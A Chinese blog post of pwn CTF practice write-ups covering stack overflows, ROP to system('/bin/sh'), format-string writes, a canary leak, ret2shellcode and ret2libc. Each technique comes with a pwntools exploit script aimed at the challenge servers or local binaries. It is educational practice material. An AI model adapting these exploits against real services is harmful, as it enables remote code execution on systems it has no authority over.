关于以前学的都忘了于是决定写几道题练练手这件事

最新推荐文章于 2024-08-07 15:51:35 发布
最新推荐文章于 2024-08-07 15:51:35 发布
阅读量2.1k 收藏 1
点赞数 10
分类专栏: 笔记 文章标签: pwn 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jzc020121/article/details/114826983
版权

文章目录

关于以前学的都忘了于是决定写几道题练练手这件事

由于之前颓废了一段时间,又正好是新学期,于是决定复习一下最最最简单的pwn题

pwn复习wp

1. 基础nc题

例1 get shell

在这里插入图片描述

直接运行就得到shell了

我能说啥,nc一下

嗯,我唯一一道能在本机上做出来的题

当然强行写一个脚本的话也不是不可以

from pwn import*
sh = remote('220.249.52.134',39800)
sh.interactive()

直接ok

例二 bugku – pwn1

没什么好说的nc

2.简单栈溢出

例1 level0

于是写payload

from pwn import*
sh = remote('220.249.52.134',32118)
sh.recv()
payload = b'a'*(0x80+8)+p64(0x400596)
sh.sendline(payload)
sh.interactive()

于是

例2 born

嗯,简单的用gets改变变量数值,不过缺点就是,改变的变量必须要比输入的变量更靠近ebp

from pwn import*
from LibcSearcher import*
context(log_level='debug')
sh = remote('220.249.52.134','57702')
sh.recvuntil("?")
sh.sendline("2000")
sh.recvuntil("?")
payload = b"a"*(0x20-0x18)+p64(1926)
sh.sendline(payload)
sh.interactive()

于是运行

例三 hello_pwn

真不错,直接改个数就好

嗯,只隔了四位

上脚本

from pwn import*
from LibcSearcher import*
context(log_level='debug')
sh = remote('220.249.52.134','52887')
sh.recvuntil("bof")
payload = b"a"*4+p64(1853186401)
sh.sendline(payload)
sh.interactive()

例四 bugku --pwn1

ok,过于简单,直接上exp

from pwn import*
from LibcSearcher import*
context(log_level='debug')
sh = remote('114.67.246.176','15201')
payload = b"a"*(0x30+8)+p64(0x400751)
sh.sendline(payload)
sh.interactive()

3.开始分手并逝去的system(/bin/sh)

例1 level2

嗯,bin和system分手了,找bin

ok了

from pwn import*
from LibcSearcher import*
context(log_level='debug')
sh = remote('220.249.52.134','38538')
system = 0x8048320
bin_sh = 0x0804A024
payload = b'a'*(0x88+4)+p32(system)+b'a'*4+p32(bin_sh)
sh.sendline(payload)
sh.interactive()

例二 --老的bugku–pwn4

基本操作没什么可说的,没有bin找一下

没找到bin,但找到了可代替的东西‘$0’

于是

用ROPgadget找到位置(注意\6),顺便一提,用了string试了一下,怎么说,和ida里一样。

顺便看一眼rdi

写个脚本

from pwn import*
from LibcSearcher import*
context(log_level='debug')
sh = process('./pwn4')
system = 0x400570
bin_sh = 0x60111f
rdi = 0x4007d3
payload = b'a'*(0x10+8)+p64(rdi)+p64(bin_sh)+p64(system)
sh.recvuntil('pwn me')
sh.sendline(payload)
sh.interactive()

然后离谱的事情出现了,这竟然没pwn成,考虑到明天就考核了,我就先放一下,感觉问题不大

4.格式化字符串

例1 cgfsb

很明显我们要用格式化字符串把pwnme改变

先找偏移量

from pwn import*
from LibcSearcher import*
context(log_level='debug')
sh = remote('220.249.52.134',47577)
sh.recvuntil("name:")
sh.sendline('jzc')
payload = 'aaaa'+'%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p'
sh.recvuntil('leave your message please:')
sh.sendline(payload)
sh.interactive()

偏移量为10

写脚本

from pwn import*
from LibcSearcher import*
context(log_level='debug')
sh = remote('220.249.52.134',49186)
sh.recvuntil("name:")
sh.sendline('jzc')
pwnme = 0x0804A068
payload = p32(pwnme)+b'aaaa'+b'%10$n'
sh.recvuntil('leave your message please:')
sh.sendline(payload)
sh.interactive()

于是

话说这样也可以

from pwn import*
from LibcSearcher import*
context(log_level='debug')
sh = remote('220.249.52.134',47577)
sh.recvuntil("name:")
sh.sendline('jzc')
pwnme = 0x0804A068
payload = b'%8d%'+b'12$n'+p32(pwnme)
sh.recvuntil('leave your message please:')
sh.sendline(payload)
sh.interactive()
例二 队长的pwnme2.elf

from pwn import*
from LibcSearcher import*
context(log_level='debug')
sh = process('./pwnme2.elf')
sh.recvuntil('\n')
here_addr=0x0000000000404048
payload = 'aaaaaaaa'+'%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p'
sh.sendline(payload)
sh.interactive()

算出偏移量为6

写脚本

from pwn import*
context(log_level = "debug")
sh = process('./pwnme2.elf')#painyiliang=6
sh.recvuntil('\n')
here_addr=0x0000000000404048
payload = b'00000000'+b'%92d%8$n'+p64(here_addr)#地址“\0”会截断,所以把p64放到后面.%92d是为了填充92个字符怕被爆掉,且满足八位一组。“00000000”同样为了满足把为一组.
sh.sendline(payload)

sh.interactive()

5.我就是要栈溢出

例1 int_overflow

没什么特别的,就是对长度进行了一个检查

之前笔记里提过了不再赘述,__int8说明是8位二进制决定的整形数,于是256=0.

于是写脚本

from pwn import*
from LibcSearcher import*
context(log_level='debug')
sh = remote('220.249.52.134','53123')
sh.recvuntil("Your choice:")
sh.sendline('1')
sh.recvuntil("username:")
sh.sendline("jzc")
payload = b'A' * (0x14+4) + p32(0x804868b)+b'a'*233
sh.recvuntil('Please input your passwd:')
sh.sendline(payload)
sh.interactive()

于是

例二 绕过can(Mary_Morton)

啊这,看起来这个程序想和我battle一下,那咱们进sub_4009DA和sub_4008EB看一眼。

再结合总程序来看很明显,当我们输入1,用的bufferoverflow啥意思我也不知道,大概是溢出啥玩意,但输入2的话,很明显是我们的老朋友了,格式化字符串漏洞。,于是随机产生思路,我们第一步直接用格式化字符串找到偏移量。

from pwn import*
from LibcSearcher import*
context(log_level='debug')
sh = remote( '220.249.52.134',55640)
sh.recvuntil('battle \n')
sh.sendline('2')
payload = 'aaaaaaaa'+'%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p'
sh.sendline(payload)
sh.interactive()

执行后得到偏移量。

很明显我们可以看出偏移量为6

由ida我们可以看到,我们的buf距离ebp有0x90的距离。ok,0x90-0x8=0x88,0x88/8=17,17+6=23,那么到这里我们终于知道can的位置了。此时准备工作完成,我们开始写脚本

from pwn import*
context(os='linux',arch='amd64',log_level='debug')
sh = remote( '220.249.52.133',43484)
sh.recvuntil('battle \n')
sh.sendline('2')
sh.sendline('%23$p')
can = int (sh.recv(),16)
flag = 0x4008DA
payload = b'a'*(0x90-8) + p64(can) + b'a'*8 +p64(flag)
sh.recvuntil('battle \n')
sh.sendline('1')
sh.sendline(payload)
sh.interactive()

6.ret2shellcode

例1 队长的pwnme.elf

那么发现可以函数Crakeme,跟进一下。

发现之前输出的奇怪的东西是buf的地址,又发现溢出点read

嘛,总之先看看有没有system(bin/sh)

果然没有,连$0也没有,嗯,没办法了,shellcode吧。

但这里有一个问题,buf的地址他会变啊。(话说我想问一下,为啥会变啊。)于是有一个小知识点。

1.小知识,如何获得打印出来的东西

recvuntil(delims, drop=False) : 一直读到delims的pattern出现为止。**即遇到指定字符停止。**这是recvuntil的常规用法,但如果我们想获得打印出来的东西,也很简单。

格式为

recvuntil(【开头的字符】, drop=False)
a=recvuntil(【结尾的字符】, drop=True)

那么a就被赋值为我们想获取的东西了。

于是到这里我们准备工作已经做好,那我们开始写脚本吧。。

from pwn import *
context(os='linux', arch='amd64',log_level="debug")
sh = process('./pwnme.elf')
shell=shellcraft.sh()
shellcode=asm(shell)
sh.recvuntil('\n')      
add_buf = sh.recvuntil('\n', drop=True)
add_buf = int(add_buf, 16)
print(add_buf)
payload= b'b' * (0xD0+8) + p64(add_buf + 0xD0+8+8) + shellcode                                  
sh.sendline(payload)
sh.interactive()

执行后获得shell

7.ret2libc

例1 level3

没什么好说的,跟进vulnerable_function()看一眼。

上周我们了解了,puts和write两个都是output函数,这里有个write,嗯嗯这很好。

按照惯例看一眼有没有奇怪字符串。

那么很遗憾,并没有什么奇怪的字符串。于是很显然,只能是ret2libc了。

from pwn import*
from LibcSearcher import*
context(log_level='debug')
sh = remote('220.249.52.133','36335')
elf = ELF('./level3')


add_write_plt = elf.plt['write']
add_write_got = elf.got['write']
base = elf.symbols['main']
 
payload1= b'a'*(0x88+4) + p32(add_write_plt) + p32(base) + p32(1) +p32(add_write_got) + p32(4)

sh.recvuntil('Input:\n')
sh.sendline(payload1)
addr_realwrite =  u32(sh.recv()[:4])  
 
libc=LibcSearcher('write',addr_realwrite)
 
libc_system = libc.dump('system')
libc_bin =libc.dump('str_bin_sh')
write_libc = libc.dump('write')


offset = addr_realwrite - write_libc
addr_system = offset + libc_system
addr_bin =offset +  libc_bin

payload2 = b'a'*(0x88+4) + p32(addr_system) +b'a'*4 + p32(addr_bin)

sh.recvuntil('Input:\n')
sh.sendline(payload2)
sh.interactive()

金语
关注
  • 10
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
交互说明容易忽略的几件
03-04
上一篇文章了画线框图需要注意的一些问,本篇想说说关于交互说明容易忽略的一些问,供大家参考。尽管我做交互工作已经有几年了,但还是时常会犯一些常见的错误,相信这也是其他设计人员在工作中会出现的:...
【每日一练】PMP试(二).pdf
12-03
在本试中,项目经理以前完成过类似的项目,应该使用类比估算技术来进行成本估算,答案为B。 知识点三:项目整合管理 在项目整合管理中,项目经理需要对项目进行监控和控制,以便确保项目按照计划进行。在本试...
NC笔记3-树
且视他人之疑目如盏盏鬼火,大胆走吾之夜路!
04-02 665
NC笔记3-树NC5 二叉树根节点到叶子节点的所有路径和NC6 二叉树中的最大路径和NC8 二叉树中和为某一值的路径(二)NC9 二叉树中和为某一值的路径(一)NC11 将升序数组转化为平衡二叉搜索树NC12 重建二叉树NC13 二叉树的最大深度NC14 按之字形顺序打印二叉树NC15 求二叉树的层序遍历NC16 对称的二叉树NC 45 二叉树前序、中序和后序遍历NC 58找到两个错误结点NC60 判断一棵二叉树是否为搜索二叉树和完全二叉树NC62判断是不是平衡二叉树NC72 二叉树镜像NC8
CTF-BUUCTF-Pwn-test_your_nc
qq_42404383的博客
12-19 1万+
CTF-BUUCTF-Pwn-test_your_nc 目: 解思路及知识考查: 思路:根据提示,直接NC即可 NC:的使用 nc的全名是netcat,其主要用途是建立和监听任意TCP和UDP连接,支持ipv4和ipv6。因此,它可以用来网络调试、端口扫描等等。 常用语法: nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数&g...
NC65报表开发
qq_42129399的博客
03-28 8266
1、根据excel文件创建表HZYA_FIVE_RISKS 注意:建表必须使用原生sql语句不要使用navicat的建表工具否则会影响后面语义模型的创建 2、将excel文件中数据导入创建的HZYA_FIVE_RISKS表(选中excel所有数据复制再选中HZYA_FIVE_RISKS表的一行粘贴即可,有可能这种方式导入数据会出现错误,不要慌张,使用Navicat自带的【导入】工具就可以完...
bugku ctf pwn1 (nc 114.116.54.89 10001)
qq_42777804的博客
06-17 1万+
nc 114.116.54.89 10001 在Linux里面运行 nc 114.116.54.89 10001 ( nc命令用于设置路由器。) 之后用 ls -l 命令 (ls命令用于显示指定工作目录下之内容(列出目前工作目录所含之文件及子目录)。) (-l 除文件名称外,亦将文件型态、权限、拥有者、文件大小等资讯详细列出) 发现flag 使用命令 :...
嵌入式习中较好的练手项目和课整理(附代码资料、习视频和嵌入式习规划)
热门推荐
HowieXue 薛永浩的博客
08-04 10万+
目录: 0、引言 何为嵌入式? 1、单片机相关 1.1 基于单片机的智能小车、智能机器人制作 1.2 基于Arduino的3D打印机制作 2、嵌入式Linux相关 2.1 智能扫地机器人 2.2 智能可穿戴类设备:智能安全头盔 2.3 智能可穿戴类设备:面向空巢老人/病人的智能手环 2.4 物联网智能控制系统:家居、农业、医疗 2.5 基于Linux的嵌入式网络视频监控系统 ...
9012年都过去了,你确定还不安卓的热修复?(手AndFix)
Zhujiang
01-05 1045
背景介绍 热修复,乍一听,感觉好牛逼的样子,实际上并没有多么神秘,为什么这样说呢?且听我娓娓道来。。。 你发布了一款安卓应用,早上刚发版,结果发完之后发现有个bug没有修复,会直接导致整个应用崩溃,这时候你该怎么办呢?难道再马上重新打包发版吗?显然是不现实的,那么这时候热修复就来了,帮你打上一个补丁(没错,我认为热修复就像给衣服打补丁。。。),然后在你应用启动的时候直接进行修补,这样就可以不用...
极具参考价值的Python面试!从创业公司到一线大厂的真实面经汇总(持续更新)
吴秋霖的博客
04-21 4万+
全网极具参考价值的Python面试,从创业公司到一线大厂的面经汇总整理。作者会持续维护更新!
一个博士生接受怎样的训练是完整、全面的科研训练?
qq_41854911的博客
07-10 4429
我粗算了一下对机器习(偏理论和方法论 不偏工程)大概30个技能点吧(可能增加)每个点我分成 高中初 三个级别 即总共90分 为了方便理解 默认本科毕业送基础分10分 凑到100分以我自己为例 我入博士的时候是英国本科 大致上7+10=17分博一(21分):上数系博士课和机器习的入门课 并多次参加kaggle 第一次使用tensorflow但不会读paper 更不会 找了几个做ML的老师结果都被拒了 试着了解了几个女生但没遇到合适的博二上(31分):刚开遇到了我现在的导师 开始了第一个线性模型项目
超硬核!小白读了这篇文章,就能在算法圈混了
少说,多做。
03-29 3万+
作为一只超级硬核的兔子,从来不给你说废话,只有最有用的干货!这些神级算法送给你 目录 第一节 1.1bogo排序 1.2位运算 1.3打擂台 1.4morris遍历 第二节 2.1睡眠排序 2.2会死的兔子 2.3矩阵快速幂 2.4摔手机/摔鸡蛋 时空复杂度目录 二分 尝试较优的策略 归纳表达式 出暴力递归 改为动态规划 压缩空间 四边形不等式优化 换一种思路 最优解 测试: 第三节 3.1斐波那契之美 3.2桶排序 3.3快速排序...
担任设计师一年,我所到的十件
03-03
虽然以前校里面我跟朋友执行了几项计划,并非创作的菜鸟,但是这十二个月,与资深前辈共同推出世界级的软件,还是令我眼界大开。既然我已参与不少产品循环周期,与产品开发团队不同职别的成员一同合作,我从中...
应急响应-主机安全之系统及进程排查相关命令(Linux操作系统-初级篇)
关注网络安全、云原生安全
08-07 958
本文介绍下在应急响应过程中,linux系统下排查系统、进程、服务可能用到的命令,有些命令选项很多,读者可以仅看常用选项。不涉及内存、进程注入、rootkit等高级攻击的排查。常用-n参数,n为展示的数量systemctl命令 是系统服务管理器指令,它实际上将 service 和 chkconfig 这两个命令组合到一起。任务旧指令新指令使某服务自动启动使某服务不自动启动检查服务状态systemctl status httpd.service (服务详细信息)
如何确保场外个股期权交易的安全
最新发布
Lunasi的博客
08-07 83
只选择那些拥有合法金融牌照、受到监管机构严格监督的平台进行交易,确保在中国交易时,平台已获得证监会或相关金融监管机构的批准。:深入习期权的基础知识,包括不同类型的期权、它们的权利和义务、定价方式以及风险特性,从而提升自我保护的能力。:在交易前,深入分析市场趋势和相关股票的基本面,评估潜在风险,并制定相应的风险管理策略。通过这些措施,投资者可以在场外个股期权交易中提高交易的安全性,有效降低不必要的风险。:选择流动性好的期权进行交易,以便在需要时能快速买卖,减少因流动性不足带来的风险。
黑客(网络安全
2301_77160226的博客
08-05 1万+
想自网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
8月5日习笔记 glibc安装与安全用户角色权限
weixin_70751701的博客
08-05 1109
安装步骤1.安装依赖库# 添加开机启动Enter password: # 输⼊123or \g.or \g.#重启服务# 有套接字⽂件,就可以链接mysql服务or \g.owners.Type 'help;mysql>```
数据跨境传输的安全合规风险如何规避?获取免费解决方案白皮书
文件数据安全交换
08-07 269
在全球化的背景下,企业进行有 效的资源整合,习海外市场的先进技术和管理经验,寻找新的增长点,实现业务的多元化和 可持续发展,不仅有利于开辟新市场,更有助于巩固和增强企业在全球中的地位。应用风险:跨境数据的承载介质多样、呈现形态各异、应用广泛,数据所在国的政策和法律存 在差异,这可能导致数据所有和使用者权限模糊,数据应用开发存在被滥用的风险。自然灾害(如火灾、水灾、地震等)和故(如电力故障、设备故障等)可能导致数据的物理 损失,使数据的完整性和可用性遭到破坏,数据失去使用价值。2、数据攻击窃取风险。
DNS安全概述
2401_84466361的博客
08-04 1055
举个例子:现在很多服务都是托管在云上面,如果一个子域名曾经使用过,并且对外提供了服务,在下线服务的时候没有移除相应的DNS记录,同一个云上的其他用户就有可能使用原服务相同的公网IP。也有一些运营商,出于某种目的,会支持DNS流量,但是其提供的硬件资源不够,引起DNS解析异常缓慢甚至超时,严重影响用户体验。是一种由DNS客户端(通常是用户的应用程序,如一个浏览器)向本地DNS解析器发出解析请求,然后本地DNS解析器负责查询最终结果并将结果返回给客户端,而中间的所有查询请求都由本地DNS解析器代替客户端完成。
yolov5接着以前训练的模型再训练
07-28
对于使用YOLOv5来接着以前训练的模型再训练,您可以按照以下步骤进行操作: 1. 准备数据集:确保您有一个包含标注信息的新数据集,该数据集应与原始训练数据集相似。可以使用标注工具(如labelImg)对新数据集进行...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值